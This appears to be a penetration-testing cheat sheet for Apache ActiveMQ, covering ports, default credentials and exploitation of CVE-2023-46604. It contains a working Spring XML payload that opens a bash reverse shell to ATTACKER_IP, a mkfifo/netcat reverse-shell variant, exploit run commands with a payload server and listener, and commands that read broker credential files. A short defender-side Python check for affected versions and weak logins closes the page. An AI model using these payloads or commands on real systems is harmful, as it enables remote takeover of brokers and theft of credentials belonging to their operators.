Apache ActiveMQ: message broker software that often runs with elevated privileges.
Default Ports:
| Port | Service |
|---|---|
| 8161 | Web Console (HTTP/Jetty) |
| 61616 | OpenWire transport |
| 61613 | STOMP |
| 61614 | HTTP/WebSocket |
| 5672 | AMQP |
| 1883 | MQTT |
```bash
# Nmap detection
nmap -sC -sV -p 8161,61616,61613,61614,5672,1883 $ip
# Look for these strings in the output:
#   ActiveMQ OpenWire transport
#   basic realm=ActiveMQRealm
#   Jetty(9.4.x)
```

Default credentials:
| Username | Password |
|---|---|
| admin | admin |
| (blank) | (blank) |
Web console: http://TARGET:8161/admin/
CVE-2023-46604 (OpenWire RCE):
Affected: Apache ActiveMQ < 5.15.16, < 5.16.7, < 5.17.6, < 5.18.3
Port: 61616 (OpenWire transport)

```bash
# Go version (recommended)
git clone https://github.com/rootsecdev/CVE-2023-46604.git
# Python version
git clone https://github.com/evkl1d/CVE-2023-46604.git
```

Create poc-linux.xml:
```xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
       http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>bash</value>
        <value>-c</value>
        <value>bash -i >& /dev/tcp/ATTACKER_IP/9001 0>&1</value>
      </list>
    </constructor-arg>
  </bean>
</beans>
```

Alternative payload (mkfifo):
```xml
<value>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ATTACKER_IP 9001 >/tmp/f</value>
```

```bash
# 1. Host the XML payload
python3 -m http.server 8000
# 2. Start listener
nc -nlvp 9001
# 3. Run exploit (Go version)
./ActiveMQ-RCE -i TARGET_IP -p 61616 -u http://ATTACKER_IP:8000/poc-linux.xml
# Python version
python3 exploit.py -i TARGET_IP -p 61616 -u http://ATTACKER_IP:8000/poc-linux.xml
# If the web server gets hit but no shell comes back, check the XML payload encoding:
# make sure &gt; is used for > and &amp; for &
```

ActiveMQ often runs as a dedicated user:
```bash
# Check user
id
# uid=1000(activemq) gid=1000(activemq)
# Config files
ls -la /opt/apache-activemq-*/conf/
cat /opt/apache-activemq-*/conf/activemq.xml
cat /opt/apache-activemq-*/conf/jetty-realm.properties
cat /opt/apache-activemq-*/conf/credentials.properties
```
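As an added defender-side check (not code from the original page or from either exploit repository): given a broker version string, decide whether it falls inside the CVE-2023-46604 affected ranges listed above, and flag web-console accounts in jetty-realm.properties that still use a blank password or one equal to the username (the admin/admin and blank/blank defaults). The jetty-realm.properties sample is constructed, and the function names are this example's own.

```python
import re

# Fix releases for CVE-2023-46604 per branch, taken from the affected ranges on the page.
FIXED_RELEASES = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}

def parse_version(text):
    """Extract a (major, minor, patch) tuple from a string such as 'ActiveMQ 5.15.15'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version found in {text!r}")
    return tuple(int(x) for x in m.groups())

def is_affected(version_text):
    """True if the broker version predates the fix release of its branch."""
    v = parse_version(version_text)
    fixed = FIXED_RELEASES.get(v[:2])
    if fixed is not None:
        return v < fixed
    # Branches older than 5.15 got no fix; 5.15.16 is the oldest fixed release.
    return v < (5, 15, 16)

def weak_console_logins(realm_text):
    """Users in jetty-realm.properties ('user: password [, role ...]') with blank or username-equal passwords."""
    weak = []
    for line in realm_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, rest = line.split(":", 1)
        user = user.strip()
        password = rest.split(",", 1)[0].strip()
        if password == "" or password == user:
            weak.append(user)
    return weak

# Constructed sample of a jetty-realm.properties file (not captured from a real host).
SAMPLE_REALM = """# username: password [,rolename ...]
admin: admin, admin
user: user, user
ops: S3cure!Passw0rd, admin
"""

if __name__ == "__main__":
    print(is_affected("5.15.15"), weak_console_logins(SAMPLE_REALM))  # True ['admin', 'user']
```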